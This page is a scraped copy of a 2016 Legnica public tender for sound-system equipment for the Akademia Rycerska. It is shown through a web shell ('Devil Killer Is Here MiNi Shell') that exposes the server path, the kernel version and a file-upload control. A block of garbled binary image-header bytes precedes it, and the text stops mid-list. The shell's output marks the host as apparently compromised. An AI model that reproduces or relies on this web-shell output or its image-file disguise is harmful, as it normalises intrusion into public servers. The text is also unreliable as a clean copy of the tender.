JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160324/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160324/67108-N-2016.html

<p class="kh_header"><b>Legnica: Dostawa wyposażenia elektroakustycznego w ramach zadania Remont i rewaloryzacja Akademii Rycerskiej ul. Chojnowska 2 w Legnicy - obiekt wpisany do rejestru zabytków, nr rejestru  595/1015.</b><br>
<b>Numer ogłoszenia: 67108 - 2016; data zamieszczenia: 24.03.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent Miasta Legnicy , pl. Słowiański 8, 59-220 Legnica, woj. dolnośląskie, tel. 076 7212100, faks 076 7212115.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.bip.legnica.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa wyposażenia elektroakustycznego w ramach zadania Remont i rewaloryzacja Akademii Rycerskiej ul. Chojnowska 2 w Legnicy - obiekt wpisany do rejestru zabytków, nr rejestru  595/1015..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.1. Przedmiotem zamówienia jest dostawa, instalacja, uruchomienie, programowanie urządzeń cyfrowych, strojenie systemu nagłaśniania, dokumentacja powykonawcza, szkolenie 2 osób, oraz czynności ujęte w projekcie wykonawczym, specyfikacji technicznej,  przedmiarach, a także serwis gwarancyjny składającego się między innymi z poniższych elementów:
I. SYSTEM FRONTOWY 
1.Urządzenie głośnikowe, szerokopasmowe, dwurożne, kompaktowego systemu wyrównanego liniowo - 6szt, 
2.Rama do podwieszania urządzeń głośnikowych UGLxx, UGRxx, UGSLxx w system typu -line array  - 2szt
3.Uchwyt umożliwiający powieszenie ramy RAMA01 i RAMA02 do rury kraty systemowej - 2szt
4.Skrzynia transportowa na 3 szt UGLx/UGRxx - 2szt
5.Wzmacniacz mocy + procesor głośnikowy+okablowanie wewnętrzne - 2szt
6.Niskotonowe urządzenie głośnikowe - 6szt
7.Deska z kółkami dla niskotonowego urządzenia głośnikowego SUB01-SUB06 9 - 6szt
8.Pokrowiec dla niskotonowego urządzenia głośnikowego SUB01-SUB06 - 6szt
9.Skrzynia transportowa 4U z nóżkami na Wmxx - 2szt;
10.Skrzynia transportowa na ramę i osłonę ram RAMA01, RAMA02 - 1szt
II. FRONTFILL DELAY
1.Urządzenie głośnikowe, szerokopasmowe, dwurożne - 8szt
2.Uchwyt ścienny dla UGDxx - 4szt
3.Adapter do mocowania UGD na statywie - do wykorzystania w Sali Królewskiej - 4szt
4.Skrzynia transportowa dla 4sztuGFxx, UGDxx i uchwyty - 2szt
5.Wzmacniacz mocy + procesor głośnikowy+okablowanie wewnętrzne - 2szt
6.Skrzynia transportowa 4U z nóżkami na WMxx - 2szt
III. SYSTEM SCENA LETNIA
1.Urządzenie głośnikowe, szerokopasmowe, dwurożne, kompaktowego systemu wyrównanego liniowo - 6szt, 
2.Przewód głośnikowy 2x4mm2, 20m ze złączami głośnikowymi wielostykowymi - 10szt,
3.Przejściówka (tzw. beczka) głośnikowymi wiekostykowymi - złącze głośnikowe wielostykowe 4szt,
4.Osłona przeciwdeszczowa złącz dla UGL01-UGL03, UGR01-UGR03, UGSL01-UGSL06 - 12szt;
5.Osłona przeciwdeszczowa ram RAMA01 - 2szt;
6.Skrzynia transportowa na 3sztuki UGSLxx - 2szt;
7.Niskotonowe urządzenie głośnikowe - 3szt; 
8.Deska z kółkami dla niskotonowego urządzenia głośnikowego SUBSL01-SUBSL03 - 3szt;
9.Pokrowiec dla SUBSL01-SUBSL03 - 3szt;
10.Uchwyt/statyw umożliwiający postawienie i powieszenie do 3szt UGSLxx - 2szt;
11.Przełącznik sieciowy Ethernet 1Gb/s, 28port - 1szt;
12.Rozdzielnia elektryczna przenośna wej. - 2m przewodu z wtyczką CEE 32A 5p, wyjścia: 2×CEE 32A 5p, 2×16A 5p, 4×GS 250V, IP44 - 1szt;
13.	przewód hybrydowy do instalacji mobilnych (zasilanie 3 × 2,5mm2; 2 × cat.6, 2 × DMX) 60m, złącza: 2xgniazdo zasilające,1x wtyk zasilający, 2xXLR-F, 2xgniazdo i 2xwtyk RJ45 w metalowej obudowie na bębnie kablowym z nóżkami rączką do przenoszenia -1szt.
IV.MONITOR
1.Urządzenie głośnikowe szerokopasmowe koncentryczne, monitor sceniczny odsłuchowy - 8szt;
2.Wzmacniacz mocy + procesor głośnikowy + okablowanie wewnętrzne -2szt;
3.Skrzynia transportowa 4U na WMxx - 2szt;
4.Przewód głośnikowy zakończony złączami głośnikowymi wielostykowymi 2x4mm2, 10m - 8szt;
5.Przewód głośnikowy zakończony złączami głośnikowymi wielostykowymi 2x4mm2, 5m - 4szt;
6.Skrzynia transportowa na 2szt. UGM01-UGM08 - 4szt;
V. KONSOLETA
1.Cyfrowa konsola foniczna+wskaźnik poziomu sygnału 2 kpl;
2.Lampka LEDdo cyfrowej konsoli fonicznej - 4szt;
3.Karta 8in/8out AES/EBU do KFxx, z SRC - 2szt;
4.Komputer allinone - 1szt;
5.Przełącznik sieciowy Ethernet 1Gb/s, 28port - 2szt;
6.Router Wi-Fi dwuzakresowy - 1szt;
7.Tablet z etui - 1szt;
8.Skrzynia transportowa dla konsolet KF01,KF02 z miejscem na router Wi-fi, doghouse z panelem 1U do wyprowadzenia wej/wyj karty rozszerzeń na złącza XLR - 2szt;
9.Skrzynia transportowa na tablet TAB01, komputer PC01, router Wi-Fi ROUT01 z nóżkami - 1szt
VI. STAGEBOXY
1.Przetwornik AC-CA (stagebox) 32 Analog IN, 16 Analog OUT, 8 AES/EBU OUT, z  interfejsem Dante - 2szt;
2.Skrzynia transportowa z nóżkami na PAC01, PAC02 - 2szt;
VII. ODTWARZACZE
1.Rejestrator SSD/CD (CF, SD/SDHC, USB, CD-R/CD-RW) + karta pamięci SDHC 8GB 30MB/s + czytnik kart na USB - 2szt;
2.Szafa sprzętowa standardu 1 cali 5U i na CFCD01, CFCD02, z oświetleniem 1U, szufladą 2U z kluczem, wraz z okablowaniem wewnętrznym i kablem przyłączeniowym - 1szt
VIII. SYSTEM MIKROFONÓW BEZPRZEWODOWYCH
1.Zestaw odbiornika systemu bezprzewodowego z nadajnikiem typu beltpack, mikrofonem nagłownym - 4szt;
2.Nadajnik systemu bezprzewodowego z mikrofonem - 4szt;
3.Mikrofon krawatowy (lavalier) do nadajników z zestawów ZB01-ZB04 - 4 szt;
4.Splitter antenowy aktywny - 1 szt;
5.Zasilacz splittera antenowego SRF01 - 2szt;
6.Wzmacniacz antenowy UHF +10 dB do ANT01, ANT02 - 2szt;
7.Antena dookólna UHF, pasywna, 50 ohm - 2szt;
8.Szafa sprzętowa 1 cali, 6U z panelem oświetleniowym, szuflada 2U z wycięciami na anteny i kable antenowe, w klapach gąbka tech.z wycięciami na nadajniki mikrofony, uchwyty, wyprowadzenie złączy z tyłu skrzyni na panelach, kabel sygnał. 3m, antenowy 2x10m - 1szt;
9.Przełącznik sieciowy Ethernet 1Gb/s, 28port - 1szt.
IX.MIKROFONY I AKCESORIA
1.Zestaw mikrofonów dynamicznych do perkusji - 1kpl;
2.Mikrofon dynamiczny instrumentalny - 1szt;
3.Mikrofon dynamiczny instrumentalny - 5szt;
4.Mikrofon pojemnościowy - 4szt;
5.Mikrofon pojemnościowy - 4szt;
6.Mikrofon dynamiczny - 4szt;
7.Mikrofon pojemnościowy - 3szt;
8.Mikrofon dynamiczny - 4szt;
9.Statyw mikrofonowy sceniczny -16szt; 
10.Statyw mikrofonowy stołowy -2szt; 
11.Statyw mikrofonowy niski - 4szt;
12.Statyw głośnikowy - 6szt;
13.Separator stereofoniczny MEDIA - 1szt; 
14.Separator stereofoniczny - 4szt;
15.Skrzynia transportowa na mikrofony M06-M32 - 1szt;
16.Skrzynia transportowa z kołami na statywy mikrofonowe SM01-SM22, każdy statyw w niezależnej rurze PCV - 1szt;
17.Przewód mikrofonowy XLR M - XLR F, 10 m - 40szt;
18.Przewód liniowy TS - TS 1/4, 5 m - 10szt;
19.Przewód zasilający o długość 10 m, 8xGS230V - 10szt;
20.Słuchawki zamknięte - 2 szt;
21.Radiotelefon z akumulatorem, ładowarką, anteną, zaczepem do paska - 4szt;
22.Skrzynia transportowa na radiotelefony RT01-Rt04 + obszycie ładowarek - 1szt;
23.Skrzynia transportowa na kable z kołami, dwie przegrody regulowane - 2szt;
24.Metalowe, składane krzesło dla muzyków z miękkim siedziskiem o wysokości regulowanej w zakresie nie mniejszym niż 60-80 cm, z podnóżkiem - 2szt.
X. OKABLOWANIE RUCHOME
1.Przewód FTP cat.6 PUR, RJ-45 - RJ-45, 10m, do instalacji mobilnych - 8szt;
2.Przewód foniczny, cyfrowy, XLR/M - XLR/F, 3m - 8szt;
3.Przewód FTP cat.6 PUR, RJ-45 - RJ-45, 2m do instalacji mobilnych - 12 szt;
4.Okablowanie ruchome z przyłącza na PGL / PGR do urządzeń głośnikowych w klastrze złącze głośnikowe wielostykowe- złącze głośnikowe wielostykowe 2x4,0mm2, 0,5m - 1kpl;
5.Przewód złacze głośnikowe wielostykowe- złącze głośnikowe wielostykowe 10m, 2x4,0mm2 - 8szt; 
6.Przewód złącze głośnikowe wielostykowe- złącze głośnikowe wielostykowe 1,5m, 2x2,5mm2 - 4szt; 
7.Przewód złącze głośnikowe wielostykowe- złącze głośnikowe wielostykowe 5m, 2x4,0mm2 - 3szt;
8.Patchcord złącze głośnikowe wielostykowe- złącze głośnikowe wielostykowe 3m, 2x4,0mm2 do połączenia wzmacniaczy mocy z PAMP - 24 szt;
9.Patchcord RJ-45 - RJ-45, 1m, do połączeń w STAMP - 24szt.

1.2.  W ramach realizacji zamówienia Wykonawca jest zobowiązany do:
a) przeprowadzenia szkolenia pracowników Użytkownika, tj. Legnickiego Centrum Kultury, 
ul. Chojnowska 2 w Legnicy,
b) dostarczenia kompletnej dokumentacji powykonawczej systemu oraz instrukcji użytkowania.
c) udzielenia gwarancji i rękojmi zgodnie z § 5 projektu umowy - Rozdział 3 siwz  
d) przeprowadzania przeglądów okresowych systemu wykonywane, od dnia odbioru przedmiotu zamówienia do końca okresu gwarancyjnego i rękojmi. 
1.3. Wykonawca zapewni asystę przy obsłudze systemu  elektroakustycznego przez Użytkownika podczas imprezy w dniu 06 maja 2016r.
1.4. Sprzęt i elementy systemu Wykonawca dostarczy do siedziby Użytkownika - Legnickiego Centrum Kultury, ul. Chojnowska 2 w Legnicy, na własny koszt i ryzyko.
1.5. W celu potwierdzenia, że urządzenia i materiały dostarczane w ramach zamówienia odpowiadają wymaganiom określonym przez Zamawiającego, Wykonawcy mają dołączyć do oferty dokumenty dotyczące urządzeń np. karty produktów, katalogi, opisy producenta, itp. w języku polskim lub angielskim wraz z tłumaczeniem na język polski. Dane zawarte w tych dokumentach będą podstawą do sprawdzenia, czy oferowane urządzenia spełniają minimalne parametry techniczne określone w dokumentacji projektowej. Zamawiający zastrzega sobie prawo sprawdzenia danych zamieszczonych w załączonych do oferty dokumentach dotyczących urządzeń w innych źródłach dostępnych Zamawiającemu.
1.6. Jeżeli w opisie przedmiotu zamówienia wskazano jakikolwiek znak towarowy, patent czy pochodzenie- należy przyjąć, że wskazane patenty, znaki towarowe, pochodzenie określają parametry techniczne, eksploatacyjne, użytkowe, co oznacza, że Zamawiający dopuszcza złożenie oferty w tej części przedmiotu zamówienia o parametrach technicznych, eksploatacyjnych i użytkowych nie gorszych niż zaproponowane przez Zamawiającego.
Obowiązek udowodnienia równoważności leży po stronie Wykonawcy zgodnie z art. 30  ust 5 ww. ustawy Pzp - poprzez załączenie do oferty np. kart produktów, katalogów, opisów producenta, itp.- czyli opisów, które  w sposób nie budzący wątpliwości Zamawiającego będą potwierdzały równoważność  materiałów lub rozwiązań. 
1.7. Zaleca się aby Wykonawca  dokonał wizji lokalnej w terenie oraz do zdobył  wszelkie informacje, które mogą być konieczne do prawidłowej wyceny wartości zamówienia, gdyż wyklucza się możliwość roszczeń Wykonawcy związanych z błędnym skalkulowaniem ceny lub pominięciem elementów niezbędnych do wykonania umowy..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 32.34.00.00-8, 32.35.10.00-8, 32.35.13.00-1, 45.30.00.00-0, 45.31.00.00-3, 45.31.10.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.04.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 10.00,00 PLN</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadania wiedzy i doświadczenia tj. jako Wykonawca wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje, w okresie ostatnich 3  lat  przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w  tym okresie co najmniej dwa zamówienia polegające na dostawie z montażem i uruchomieniem systemów elektroakustycznych wykorzystujących cyfrową sieć foniczną,  w obiektach kultury takich jak np.: kino, opera, filharmonia, teatr muzyczny, teatr, sala koncertowa, sala widowiskowa,  o ilości miejsc siedzących min 250 miejsc-  wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy  te zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie wg wzoru - załącznik nr 3 do Instrukcji dla Wykonawców - Rozdział 2 siwz wraz z załączeniem:
- dowodów tj. poświadczenia podmiotów np. referencje, zawarte umowy z poświadczeniem ich realizacji,  protokoły  odbioru  itp., na rzecz których dostawy zostały wykonane, 
z tym że w odniesieniu do dostaw nadal wykonywanych ww. poświadczenie powinno być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert; a jeżeli 
z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać ww. poświadczenia  - oświadczenie Wykonawcy.
Ocena spełnienia warunku według :
a)  oświadczenia Wykonawcy- załącznik nr 1 do Instrukcji dla Wykonawców - Rozdział 2 siwz i 
   b) wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych dostaw wraz z rozmieszczeniem i instalacją, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, - z podaniem ich wartości, przedmiotu, dat wykonania i  podmiotów, na rzecz których dostawy  te zostały wykonane, oraz załączeniem dokumentów lub dowodów, czy zostały wykonane lub są wykonywane należycie wg wzoru - załącznik nr 3 do Instrukcji dla Wykonawców - Rozdział 2 siwz wraz z załączeniem:
  - dowodów tj. poświadczenia podmiotów np. referencje, zawarte umowy z poświadczeniem ich realizacji,  protokoły  odbioru  itp., na rzecz których dostawy zostały wykonane, 
z tym że w odniesieniu do dostaw nadal wykonywanych ww. poświadczenie powinno być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert; a jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać ww. poświadczenia  - oświadczenie Wykonawcy.
      Ocena spełnienia w/w warunku dokonana zostanie  zgodnie z formułą  spełnia/nie  spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowania osobami zdolnymi do wykonania zamówienia tj. mają do dyspozycji odpowiednio  wykwalifikowany personel w celu obsadzenia podanych niżej  stanowisk:
1) Kierownik prac w zakresie systemów elektroakustycznych:
osoba z wykształceniem wyższym technicznym o specjalności akustyka lub inżynieria dźwięku, która posiada kwalifikacje i doświadczenie: co najmniej 6-letnie doświadczenie zawodowe w branży akustyka lub inżynieria dźwięku w zakresie instalacji i konfiguracji sprzętu elektroakustycznego oraz pełnienie w okresie ostatnich 3 lat funkcji kierownika prac związanych z realizacją co najmniej jednego zamówienia polegającego na dostawie z montażem i uruchomieniem systemów elektroakustycznych wykorzystujących cyfrową sieć foniczną w obiektach kultury takich jak np.: kino, opera, filharmonia, teatr muzyczny, teatr, sala koncertowa, sala widowiskowa o ilości miejsc siedzących min. 250 miejsc -wraz z informacjami na temat jego kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania niniejszego zamówienia, a także zakresu wykonywanych przez niego czynności.

2)Specjalista w zakresie programowania i strojenia systemów elektroakustycznych:
osoba z wykształceniem wyższym technicznym o specjalności akustyka lub inżynieria dźwięku, która posiada kwalifikacje i doświadczenie: co najmniej roczne doświadczenie zawodowe w branży akustyka lub inżynieria dźwięku w zakresie uruchamiania, programowania i strojenia systemów elektroakustycznych - wraz z informacjami na temat jego kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania niniejszego zamówienia, a także zakresu wykonywanych przez niego czynności.
Ocena spełnienia warunku według:
 a)  oświadczenia Wykonawcy- załącznik nr 1 do Instrukcji dla Wykonawców - Rozdział 2   siwz i 
 oraz
 b) wykazu wg wzoru załącznik nr 4 , osób, które będą uczestniczyć w wykonaniu zamówienia wraz z informacjami na temat ich kwalifikacji  zawodowych, doświadczenia  i wykształcenia  niezbędnych do wykonania zamówienia a także zakresu wykonywanych przez nich czynności oraz informacją o podstawie do dysponowania  tymi osobami - wg załącznika  nr 4 do Instrukcji dla Wykonawców - Rozdział 2   siwz,  oraz:
- dla kierownika prac  informacji na temat jego kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania niniejszego zamówienia, a także zakresu wykonywanych przez niego czynności zgodnie z pkt  13 ppkt 13.2.1) Instrukcji dla Wykonawców - Rozdział 2   siwz
- dla specjalisty w zakresie programowania i strojenia systemów elektroakustycznych informacji na temat jego kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania niniejszego zamówienia, a także zakresu wykonywanych przez niego czynności zgodnie z pkt  13 ppkt 13.2.2) Instrukcji dla Wykonawców - Rozdział 2   siwz

Ocena spełnienia w/w warunku dokonana zostanie  zgodnie z formułą  spełnia/nie  spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
